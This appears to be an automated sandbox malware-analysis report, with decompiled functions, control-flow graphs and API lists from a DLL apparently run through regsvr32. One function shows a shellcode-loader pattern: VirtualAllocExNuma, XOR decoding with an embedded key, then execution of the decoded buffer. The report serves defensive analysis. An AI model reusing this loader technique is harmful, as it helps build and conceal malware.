                                                                                                              control_flow_graph 43 180002910-180002916 44 180002951-18000295b 43->44 45 180002918-18000291b 43->45 48 180002a78-180002a8d 44->48 46 180002945-180002984 call 180003628 45->46 47 18000291d-180002920 45->47 63 180002a52 46->63 64 18000298a-18000299f call 1800034bc 46->64 51 180002922-180002925 47->51 52 180002938 __scrt_dllmain_crt_thread_attach 47->52 49 180002a9c-180002ab6 call 1800034bc 48->49 50 180002a8f 48->50 65 180002ab8-180002aed call 1800035e4 call 1800033e8 _RTC_Initialize __scrt_release_startup_lock call 1800037bc call 180003614 49->65 66 180002aef-180002b20 call 18000386c 49->66 54 180002a91-180002a9b 50->54 56 180002931-180002936 call 18000356c 51->56 57 180002927-180002930 51->57 58 18000293d-180002944 52->58 56->58 71 180002a54-180002a69 63->71 77 1800029a5-1800029b6 call 18000352c 64->77 78 180002a6a-180002a77 call 18000386c 64->78 65->54 75 180002b31-180002b37 66->75 76 180002b22-180002b28 66->76 82 180002b39-180002b43 75->82 83 180002b7e-180002b86 call 180001af0 75->83 76->75 80 180002b2a-180002b2c 76->80 94 180002a07-180002a11 __scrt_release_startup_lock 77->94 95 1800029b8-1800029d5 _RTC_Initialize call 1800033d8 call 1800033fc call 180039d40 77->95 78->48 87 180002c1f-180002c2c 80->87 89 180002b45-180002b4d 82->89 90 180002b4f-180002b5d 82->90 93 180002b8b-180002b94 83->93 96 180002b63-180002b6b call 180002910 89->96 90->96 110 180002c15-180002c1d 90->110 98 180002b96-180002b98 93->98 99 180002bcc-180002bce 93->99 94->63 100 180002a13-180002a1f call 18000385c 94->100 129 1800029da-1800029dc 95->129 111 180002b70-180002b78 96->111 98->99 105 180002b9a-180002bbc call 180001af0 call 180002a78 98->105 108 180002bd5-180002bea call 180002910 99->108 109 180002bd0-180002bd3 99->109 119 180002a21-180002a2b call 180003700 100->119 120 180002a45-180002a50 100->120 105->99 132 180002bbe-180002bc3 105->132 108->110 126 180002bec-180002bf6 108->126 109->108 109->110 110->87 111->83 111->110 119->120 133 180002a2d-180002a3b 119->133 120->71 130 180002c01-180002c11 126->130 131 180002bf8-180002bff 126->131 129->94 134 1800029de-1800029e5 __scrt_dllmain_after_initialize_c 129->134 130->110 131->110 132->99 133->120 134->94 136 1800029e7-180002a04 call 180039cfc 134->136 136->94
                                                                                                              C-Code - Quality: 100%
                                                                                                              			E00000001180002910(void* __edx) {
				void* _t5;

				_t5 = __edx;
				if (_t5 == 0) goto 0x80002951;
				if (_t5 == 0) goto 0x80002945;
				if (_t5 == 0) goto 0x80002938;
				if (__edx == 1) goto 0x80002931;
				return 1;
			}




                                                                                                              0x180002914
                                                                                                              0x180002916
                                                                                                              0x18000291b
                                                                                                              0x180002920
                                                                                                              0x180002925
                                                                                                              0x180002930

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                              • String ID:
                                                                                                              • API String ID: 190073905-0
                                                                                                              • Opcode ID: 2473b6abd498bc33680f3f13fe520f5e2ecc38c18d0596e8373dd282128b670a
                                                                                                              • Instruction ID: 61cf0ea26cacccb345a1af573f9f0d533fa6da20b80700140cfc11ce11cd1d1f
                                                                                                              • Opcode Fuzzy Hash: 2473b6abd498bc33680f3f13fe520f5e2ecc38c18d0596e8373dd282128b670a
                                                                                                              • Instruction Fuzzy Hash: D381D27170064D86FBE7EB6694823D97294AB8E7C0F54C026B94947397DF39CB4E8701
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018000F550 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 139 18000f550-18000f58e 140 18000f594-18000f597 139->140 141 18000f67f 139->141 142 18000f681-18000f69d 140->142 143 18000f59d 140->143 141->142 144 18000f5a0 143->144 145 18000f5a6-18000f5b5 144->145 146 18000f677 144->146 147 18000f5c2-18000f5e1 LoadLibraryExW 145->147 148 18000f5b7-18000f5ba 145->148 146->141 151 18000f5e3-18000f5ec GetLastError 147->151 152 18000f639-18000f64e 147->152 149 18000f659-18000f668 GetProcAddress 148->149 150 18000f5c0 148->150 149->146 157 18000f66a-18000f675 149->157 153 18000f62d-18000f634 150->153 154 18000f61b-18000f625 151->154 155 18000f5ee-18000f603 call 18003c5e8 151->155 152->149 156 18000f650-18000f653 FreeLibrary 152->156 153->144 154->153 155->154 160 18000f605-18000f619 LoadLibraryExW 155->160 156->149 157->142 160->152 160->154
                                                                                                              C-Code - Quality: 50%
                                                                                                              			E0000000118000F550(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				struct HINSTANCE__* _t81;
				long long _t85;
				void* _t89;
				struct HINSTANCE__* _t94;
				long _t97;
				void* _t100;
				signed long long _t101;
				WCHAR* _t104;

				 *((long long*)(_t89 + 8)) = __rbx;
				 *((long long*)(_t89 + 0x10)) = _t85;
				 *((long long*)(_t89 + 0x18)) = __rsi;
				_t101 = _t100 | 0xffffffff;
				_t61 =  *((intOrPtr*)(0x180000000 + 0x71428 + _t81 * 8));
				if (_t61 == _t101) goto 0x8000f67f;
				if (_t61 != 0) goto 0x8000f681;
				if (__r8 == __r9) goto 0x8000f677;
				_t67 =  *((intOrPtr*)(0x180000000 + 0x71410 + __rsi * 8));
				if (_t67 == 0) goto 0x8000f5c2;
				if (_t67 != _t101) goto 0x8000f659;
				goto 0x8000f62d;
				r8d = 0x800; // executed
				LoadLibraryExW(_t104, _t100, _t97); // executed
				_t68 = _t61;
				if (_t61 != 0) goto 0x8000f639;
				if (GetLastError() != 0x57) goto 0x8000f61b;
				_t14 = _t68 + 7; // 0x7
				r8d = _t14;
				if (E0000000118003C5E8(__r8) == 0) goto 0x8000f61b;
				r8d = 0;
				LoadLibraryExW(??, ??, ??);
				if (_t61 != 0) goto 0x8000f639;
				 *((intOrPtr*)(0x180000000 + 0x71410 + __rsi * 8)) = _t101;
				goto 0x8000f5a0;
				_t21 = 0x180000000 + 0x71410 + __rsi * 8;
				_t65 =  *_t21;
				 *_t21 = _t61;
				if (_t65 == 0) goto 0x8000f659;
				FreeLibrary(_t94);
				GetProcAddress(_t81);
				if (_t65 == 0) goto 0x8000f677;
				 *((intOrPtr*)(0x180000000 + 0x71428 + _t81 * 8)) = _t65;
				goto 0x8000f681;
				 *((intOrPtr*)(0x180000000 + 0x71428 + _t81 * 8)) = _t101;
				return 0;
			}















                                                                                                              0x18000f550
                                                                                                              0x18000f555
                                                                                                              0x18000f55a
                                                                                                              0x18000f575
                                                                                                              0x18000f582
                                                                                                              0x18000f58e
                                                                                                              0x18000f597
                                                                                                              0x18000f5a0
                                                                                                              0x18000f5a9
                                                                                                              0x18000f5b5
                                                                                                              0x18000f5ba
                                                                                                              0x18000f5c0
                                                                                                              0x18000f5cf
                                                                                                              0x18000f5d5
                                                                                                              0x18000f5db
                                                                                                              0x18000f5e1
                                                                                                              0x18000f5ec
                                                                                                              0x18000f5ee
                                                                                                              0x18000f5ee
                                                                                                              0x18000f603
                                                                                                              0x18000f605
                                                                                                              0x18000f60d
                                                                                                              0x18000f619
                                                                                                              0x18000f625
                                                                                                              0x18000f634
                                                                                                              0x18000f643
                                                                                                              0x18000f643
                                                                                                              0x18000f643
                                                                                                              0x18000f64e
                                                                                                              0x18000f653
                                                                                                              0x18000f65f
                                                                                                              0x18000f668
                                                                                                              0x18000f66d
                                                                                                              0x18000f675
                                                                                                              0x18000f677
                                                                                                              0x18000f69d

                                                                                                              APIs
                                                                                                              • LoadLibraryExW.KERNELBASE(?,?,?,000000018000F95B,?,?,?,000000018000E27C,?,?,?,?,0000000180004F05), ref: 000000018000F5D5
                                                                                                              • GetLastError.KERNEL32(?,?,?,000000018000F95B,?,?,?,000000018000E27C,?,?,?,?,0000000180004F05), ref: 000000018000F5E3
                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,000000018000F95B,?,?,?,000000018000E27C,?,?,?,?,0000000180004F05), ref: 000000018000F60D
                                                                                                              • FreeLibrary.KERNEL32(?,?,?,000000018000F95B,?,?,?,000000018000E27C,?,?,?,?,0000000180004F05), ref: 000000018000F653
                                                                                                              • GetProcAddress.KERNEL32(?,?,?,000000018000F95B,?,?,?,000000018000E27C,?,?,?,?,0000000180004F05), ref: 000000018000F65F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                              • String ID: api-ms-
                                                                                                              • API String ID: 2559590344-2084034818
                                                                                                              • Opcode ID: b22cffdbc5156b7699b9e6ed061bc683ae1de6a7e518bc903a77d5191b6cb189
                                                                                                              • Instruction ID: a0f7a7e146d0472019a5f4cedeea5f0297e5a247b09fa3e1c7336c428ccf4d18
                                                                                                              • Opcode Fuzzy Hash: b22cffdbc5156b7699b9e6ed061bc683ae1de6a7e518bc903a77d5191b6cb189
                                                                                                              • Instruction Fuzzy Hash: A5318331712B48A1EEA3DB16A8007E53394B74CBE4F598536BD1D5BBA0EF39C6899700
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018003D168 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(?,?,?,0000000180013B21,?,?,?,?,000000018003F928), ref: 000000018003D177
                                                                                                              • FlsSetValue.KERNEL32(?,?,?,0000000180013B21,?,?,?,?,000000018003F928), ref: 000000018003D1AD
                                                                                                              • FlsSetValue.KERNEL32(?,?,?,0000000180013B21,?,?,?,?,000000018003F928), ref: 000000018003D1DA
                                                                                                              • FlsSetValue.KERNEL32(?,?,?,0000000180013B21,?,?,?,?,000000018003F928), ref: 000000018003D1EB
                                                                                                              • FlsSetValue.KERNEL32(?,?,?,0000000180013B21,?,?,?,?,000000018003F928), ref: 000000018003D1FC
                                                                                                              • SetLastError.KERNEL32(?,?,?,0000000180013B21,?,?,?,?,000000018003F928), ref: 000000018003D217
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Value$ErrorLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 2506987500-0
                                                                                                              • Opcode ID: ac1a49fbfa827236b2cde6565bf2c6c61bcef898428b56ef635a6391f0513caa
                                                                                                              • Instruction ID: 95d5e4ceb0f396c436efd02835e24f4033335e728ed31340f2e6177d50ffdaa0
                                                                                                              • Opcode Fuzzy Hash: ac1a49fbfa827236b2cde6565bf2c6c61bcef898428b56ef635a6391f0513caa
                                                                                                              • Instruction Fuzzy Hash: BE11843030164C42FAEBA77565813FA53516B8C7F4F56C716B836477C7DE28C6498300
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180001AF0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              C-Code - Quality: 49%
                                                                                                              			E00000001180001AF0(void* __edx, long long __rbx, long long __rcx, long long __rsi, long long __rbp, void* __r8, void* __r9, void* __r10, signed long long __r11, long long _a16, long long _a24, long long _a32) {
				void* _v24;
				signed int _v40;
				void* _v3016;
				signed int _v3024;
				intOrPtr _v3032;
				void* __rdi;
				void* _t35;
				void* _t37;
				intOrPtr _t38;
				void* _t44;
				signed int _t130;
				signed int _t131;
				signed int _t133;
				signed int _t134;
				signed long long _t145;
				signed long long _t146;
				void* _t149;
				signed long long _t151;
				signed long long _t157;
				void* _t165;
				void* _t170;
				signed long long _t171;
				long long _t178;
				signed long long _t180;
				long long _t182;

				_t180 = __r11;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t171 = _t170 - 0xbe0;
				_t145 =  *0x80070098; // 0xde2ac6aee6eb
				_t146 = _t145 ^ _t171;
				_v40 = _t146;
				_t182 = __rcx;
				if (__edx != 1) goto 0x80001dda;
				r8d = 0xb9d;
				E00000001180003FF0();
				0x800399a4();
				E00000001180002854(0x8005d6a0, __r9); // executed
				if (_t146 == 0) goto 0x80001dd6;
				 *((char*)(__rbx + _t146)) = 0;
				_t149 = __rbx + 1;
				if (_t149 - _t165 < 0) goto 0x80001b6d;
				_t37 = E0000000118000285C(0x8005d6a0, __r9); // executed
				if (_t149 != _t165) goto 0x80001dd6;
				 *0x8007003c =  *0x8007003c & 0x00000000;
				_t157 = L"64";
				 *0x80070040 =  *0x80070040 & 0x00000000;
				 *0x80070044 =  *0x80070044 & 0x00000000;
				 *0x8007004c =  *0x8007004c & 0x00000000;
				 *0x80070048 =  *0x80070048 & 0x00000000;
				 *0x80070050 =  *0x80070050 & 0x00000000;
				_t38 = E000000011800393EC(_t37, _t146, _t149, _t157, _t165);
				r11d =  *0x80070050; // 0x0
				r8d =  *0x80070048; // 0x0
				r9d =  *0x80070044; // 0x0
				r10d =  *0x8007003c; // 0x0
				_t44 = GetCurrentProcess();
				_v3024 = _v3024 & 0x00000000;
				r9d = 0x8005d6a0 + _t146 * 0x00000002 | 0x00001000 + _t157 * 0x00000002;
				_v3032 = _t38;
				__imp__VirtualAllocExNuma(); // executed
				_t151 = _t146;
				r8d = 0x18005d6d0;
				E000000011800046A0(_t44, 0, 0x80070cb0, 0x8005d6a0, 0x2b8cc04);
				_t130 =  *0x80070050; // 0x0
				_t178 = "S+Z!sX0^Mwg%>F>B^qkxqr^aAiDNyxSV";
				_t133 =  *0x80070044; // 0x0
				r8d =  *0x80070040; // 0x0
				r15d =  *0x80070048; // 0x0
				r11d =  *0x8007004c; // 0x0
				 *0x80070cb0 = _t182;
				r14d = 0;
				 *0x80070cb8 = _t178;
				 *0x80070cc0 = 0x21;
				 *0x80070cc8 = 0xc70a;
				 *0x80070cd0 = 0x17;
				if (r15d * r8d - (_t130 * _t133 + r8d) * _t133 - _t180 + _t180 - _t130 + 0x2b8cc04 <= 0) goto 0x80001dc3;
				r9d =  *0x8007003c; // 0x0
				r11d = r11d - (_t130 * r15d * r11d * r9d + _t133) * r9d;
				r11d = r11d - _t130;
				r11d = r11d + _t133;
				r14d = r14d + 1;
				 *(_t182 + _t180 * 2 + _t151) =  *(_t171 + r14d - (r11d * r11d * r8d * r8d * r9d + r15d) * r8d - _t130 - r15d - r11d + _t133 + 0x30) ^  *(r14d - ((0x3e0f83e1 * r14d >> 0x20 >> 3) + (0x3e0f83e1 * r14d >> 0x20 >> 3 >> 0x1f)) * 0x21 + _t178);
				_t131 =  *0x80070050; // 0x0
				_t134 =  *0x80070044; // 0x0
				r8d =  *0x80070040; // 0x0
				r15d =  *0x80070048; // 0x0
				r11d =  *0x8007004c; // 0x0
				if (r14d - r15d * r8d - (_t131 * _t134 + r8d) * _t134 - _t180 + _t180 - _t131 + 0x2b8cc04 - _t35 >= 0) goto 0x80001dc3;
				goto 0x80001cf0;
				 *_t151();
				if ( *0x80070cd8 != 0) goto 0x80001dda;
				goto 0x80001ddf;
				return E000000011800028F0(1, r15d * r8d - (_t131 * _t134 + r8d) * _t134 - _t180 + _t180 - _t131 + 0x2b8cc04 - _t35, _v40 ^ _t171);
			}




























                                                                                                              0x180001af0
                                                                                                              0x180001af0
                                                                                                              0x180001af5
                                                                                                              0x180001afa
                                                                                                              0x180001b04
                                                                                                              0x180001b0b
                                                                                                              0x180001b12
                                                                                                              0x180001b15
                                                                                                              0x180001b1d
                                                                                                              0x180001b23
                                                                                                              0x180001b2e
                                                                                                              0x180001b3b
                                                                                                              0x180001b47
                                                                                                              0x180001b58
                                                                                                              0x180001b60
                                                                                                              0x180001b6d
                                                                                                              0x180001b70
                                                                                                              0x180001b76
                                                                                                              0x180001b7b
                                                                                                              0x180001b83
                                                                                                              0x180001b89
                                                                                                              0x180001b90
                                                                                                              0x180001b97
                                                                                                              0x180001b9e
                                                                                                              0x180001ba5
                                                                                                              0x180001bac
                                                                                                              0x180001bb3
                                                                                                              0x180001bba
                                                                                                              0x180001bbf
                                                                                                              0x180001bc8
                                                                                                              0x180001bd2
                                                                                                              0x180001bdc
                                                                                                              0x180001c3b
                                                                                                              0x180001c41
                                                                                                              0x180001c46
                                                                                                              0x180001c4c
                                                                                                              0x180001c55
                                                                                                              0x180001c64
                                                                                                              0x180001c67
                                                                                                              0x180001c6b
                                                                                                              0x180001c70
                                                                                                              0x180001c76
                                                                                                              0x180001c7d
                                                                                                              0x180001c85
                                                                                                              0x180001c8c
                                                                                                              0x180001c96
                                                                                                              0x180001ca4
                                                                                                              0x180001cab
                                                                                                              0x180001cb2
                                                                                                              0x180001cb9
                                                                                                              0x180001cc4
                                                                                                              0x180001cd2
                                                                                                              0x180001cea
                                                                                                              0x180001cf0
                                                                                                              0x180001d5d
                                                                                                              0x180001d60
                                                                                                              0x180001d63
                                                                                                              0x180001d6a
                                                                                                              0x180001d70
                                                                                                              0x180001d73
                                                                                                              0x180001d7b
                                                                                                              0x180001d81
                                                                                                              0x180001d88
                                                                                                              0x180001d92
                                                                                                              0x180001db5
                                                                                                              0x180001dbe
                                                                                                              0x180001dca
                                                                                                              0x180001dd4
                                                                                                              0x180001dd8
                                                                                                              0x180001e0b

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocCurrentNumaProcessVirtual
                                                                                                              • String ID: 45662311$S+Z!sX0^Mwg%>F>B^qkxqr^aAiDNyxSV
                                                                                                              • API String ID: 346376999-3951590949
                                                                                                              • Opcode ID: 29f87943e0751d83b164f25a66cb79c7386ca0b4a54ca12213906f56e78ebf8b
                                                                                                              • Instruction ID: 03e643bd6b656ffe0902f65e4295077c755dfa93048facdfd5e12145c7bb20e6
                                                                                                              • Opcode Fuzzy Hash: 29f87943e0751d83b164f25a66cb79c7386ca0b4a54ca12213906f56e78ebf8b
                                                                                                              • Instruction Fuzzy Hash: E881E232220288CAE78ADF24E9147E477A5B39C7D5F15D21AB90A977A4DF3DCA0CC740
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180044890 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 210 180044890-1800448c7 211 180044a14-180044a1a 210->211 212 1800448cd-1800448da GetCPInfo 210->212 214 180044a1f-180044a2a 211->214 212->211 213 1800448e0-1800448e7 212->213 215 1800448ec-1800448f5 213->215 216 180044a34-180044a38 214->216 217 180044a2c-180044a32 214->217 215->215 218 1800448f7-180044905 215->218 220 180044a42 216->220 221 180044a3a-180044a40 216->221 219 180044a44-180044a51 217->219 223 180044927-180044929 218->223 219->214 222 180044a53-180044a76 call 1800028f0 219->222 220->219 221->219 225 180044907-18004490f 223->225 226 18004492b-180044985 call 18004b3ec call 180052f2c 223->226 228 18004491c-18004491f 225->228 235 18004498a-1800449db call 180052f2c 226->235 230 180044911-180044913 228->230 231 180044921-180044925 228->231 230->231 233 180044915-18004491a 230->233 231->223 233->228 238 1800449df-1800449e2 235->238 239 1800449e4-1800449ec 238->239 240 1800449ee-1800449f1 238->240 241 1800449ff-180044a10 239->241 242 1800449f3-1800449fb 240->242 243 1800449fd 240->243 241->238 244 180044a12 241->244 242->241 243->241 244->222
                                                                                                              C-Code - Quality: 60%
                                                                                                              			E00000001180044890(long long __rbx, void* __rcx, long long __rdi) {
				signed int _t83;
				void* _t94;
				signed int _t102;
				signed long long _t107;
				signed char* _t112;
				long long _t114;
				char* _t118;
				signed char* _t120;
				void* _t125;
				signed char* _t129;
				signed char* _t130;
				void* _t132;
				void* _t134;
				int _t135;
				void* _t136;
				void* _t138;
				signed long long _t139;
				void* _t143;
				void* _t148;

				_t114 = __rbx;
				 *((long long*)(_t138 + 0x10)) = __rbx;
				 *((long long*)(_t138 + 0x18)) = __rdi;
				_t136 = _t138 - 0x680;
				_t139 = _t138 - 0x780;
				_t107 =  *0x80070098; // 0xde2ac6aee6eb
				 *(_t136 + 0x670) = _t107 ^ _t139;
				_t132 = __rcx;
				if ( *((intOrPtr*)(__rcx + 4)) == 0xfde9) goto 0x80044a14;
				if (GetCPInfo(_t135) == 0) goto 0x80044a14;
				_t118 = _t139 + 0x70;
				 *_t118 = 0;
				_t119 = _t118 + 1;
				if (1 - 0x100 < 0) goto 0x800448ec;
				_t125 = _t139 + 0x56;
				 *((char*)(_t139 + 0x70)) = 0x20;
				goto 0x80044927;
				r8d =  *(_t125 + 1) & 0x000000ff;
				_t83 =  *(_t139 + 0x56) & 0x000000ff;
				goto 0x8004491c;
				if (_t83 - 0x100 >= 0) goto 0x80044921;
				 *((char*)(_t139 + _t118 + 0x71)) = 0x20;
				if (_t83 + 1 - r8d <= 0) goto 0x80044911;
				_t100 =  *((intOrPtr*)(_t125 + 2));
				if ( *((intOrPtr*)(_t125 + 2)) != 0) goto 0x80044907;
				 *(_t139 + 0x30) =  *(_t139 + 0x30) & 0x00000000;
				r9d = 0x100;
				 *((intOrPtr*)(_t139 + 0x28)) =  *((intOrPtr*)(__rcx + 4));
				 *(_t139 + 0x20) = _t136 + 0x270;
				E0000000118004B3EC(1,  *((intOrPtr*)(_t125 + 2)), __rbx, _t118 + 1, __rcx, _t134, _t139 + 0x70);
				 *(_t139 + 0x40) =  *(_t139 + 0x40) & 0x00000000;
				r8d = 0x100;
				 *((intOrPtr*)(_t139 + 0x38)) =  *((intOrPtr*)(__rcx + 4));
				 *(_t139 + 0x30) = 0x100;
				 *((long long*)(_t139 + 0x28)) = _t136 + 0x70;
				 *(_t139 + 0x20) = 0x100;
				E00000001180052F2C(0, 1, _t94,  *((intOrPtr*)(_t125 + 2)), _t136 + 0x70, _t114, _t119,  *((intOrPtr*)(__rcx + 0x220)), _t134, _t139 + 0x70, _t148); // executed
				 *(_t139 + 0x40) =  *(_t139 + 0x40) & 0x00000000;
				r8d = 0x200;
				 *((intOrPtr*)(_t139 + 0x38)) =  *((intOrPtr*)(__rcx + 4));
				 *(_t139 + 0x30) = 0x100;
				 *((long long*)(_t139 + 0x28)) = _t136 + 0x170;
				 *(_t139 + 0x20) = 0x100;
				E00000001180052F2C(0, 1, _t94, _t100, _t136 + 0x170, _t114, _t119,  *((intOrPtr*)(__rcx + 0x220)), _t134, _t139 + 0x70, _t148);
				_t143 = _t136 + 0x70 - __rcx;
				_t129 = _t136 + 0x270;
				_t44 = _t132 + 0x19; // 0x19
				_t112 = _t44;
				if (( *_t129 & 0x00000001) == 0) goto 0x800449ee;
				 *_t112 =  *_t112 | 0x00000010;
				goto 0x800449ff;
				_t102 =  *_t129 & 0x00000002;
				if (_t102 == 0) goto 0x800449fd;
				 *_t112 =  *_t112 | 0x00000020;
				goto 0x800449ff;
				_t112[0x100] = 0;
				_t130 =  &(_t129[2]);
				if (_t102 != 0) goto 0x800449df;
				goto 0x80044a53;
				_t54 = _t132 + 0x19; // 0x19
				_t120 = _t54;
				_t55 = _t130 - 0x61; // -97
				r8d = _t55;
				_t56 = _t143 + 0x20; // -65
				if (_t56 - 0x19 > 0) goto 0x80044a34;
				 *_t120 =  *_t120 | 0x00000010;
				goto 0x80044a44;
				if (r8d - 0x19 > 0) goto 0x80044a42;
				 *_t120 =  *_t120 | 0x00000020;
				goto 0x80044a44;
				_t120[0x100] = 0;
				if (1 - 0x100 < 0) goto 0x80044a1f;
				return E000000011800028F0(0, 0,  *(_t136 + 0x670) ^ _t139);
			}






















                                                                                                              0x180044890
                                                                                                              0x180044890
                                                                                                              0x180044895
                                                                                                              0x18004489b
                                                                                                              0x1800448a3
                                                                                                              0x1800448aa
                                                                                                              0x1800448b4
                                                                                                              0x1800448bb
                                                                                                              0x1800448c7
                                                                                                              0x1800448da
                                                                                                              0x1800448e2
                                                                                                              0x1800448ec
                                                                                                              0x1800448f0
                                                                                                              0x1800448f5
                                                                                                              0x1800448fb
                                                                                                              0x180044900
                                                                                                              0x180044905
                                                                                                              0x180044907
                                                                                                              0x18004490c
                                                                                                              0x18004490f
                                                                                                              0x180044913
                                                                                                              0x180044915
                                                                                                              0x18004491f
                                                                                                              0x180044927
                                                                                                              0x180044929
                                                                                                              0x180044933
                                                                                                              0x180044938
                                                                                                              0x18004493b
                                                                                                              0x18004494d
                                                                                                              0x180044952
                                                                                                              0x180044957
                                                                                                              0x180044964
                                                                                                              0x180044970
                                                                                                              0x180044978
                                                                                                              0x18004497c
                                                                                                              0x180044981
                                                                                                              0x180044985
                                                                                                              0x18004498a
                                                                                                              0x180044997
                                                                                                              0x1800449a6
                                                                                                              0x1800449b1
                                                                                                              0x1800449b5
                                                                                                              0x1800449ba
                                                                                                              0x1800449be
                                                                                                              0x1800449c7
                                                                                                              0x1800449d4
                                                                                                              0x1800449db
                                                                                                              0x1800449db
                                                                                                              0x1800449e2
                                                                                                              0x1800449e4
                                                                                                              0x1800449ec
                                                                                                              0x1800449ee
                                                                                                              0x1800449f1
                                                                                                              0x1800449f3
                                                                                                              0x1800449fb
                                                                                                              0x1800449ff
                                                                                                              0x180044a05
                                                                                                              0x180044a10
                                                                                                              0x180044a12
                                                                                                              0x180044a16
                                                                                                              0x180044a16
                                                                                                              0x180044a1f
                                                                                                              0x180044a1f
                                                                                                              0x180044a23
                                                                                                              0x180044a2a
                                                                                                              0x180044a2c
                                                                                                              0x180044a32
                                                                                                              0x180044a38
                                                                                                              0x180044a3a
                                                                                                              0x180044a40
                                                                                                              0x180044a44
                                                                                                              0x180044a51
                                                                                                              0x180044a76

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
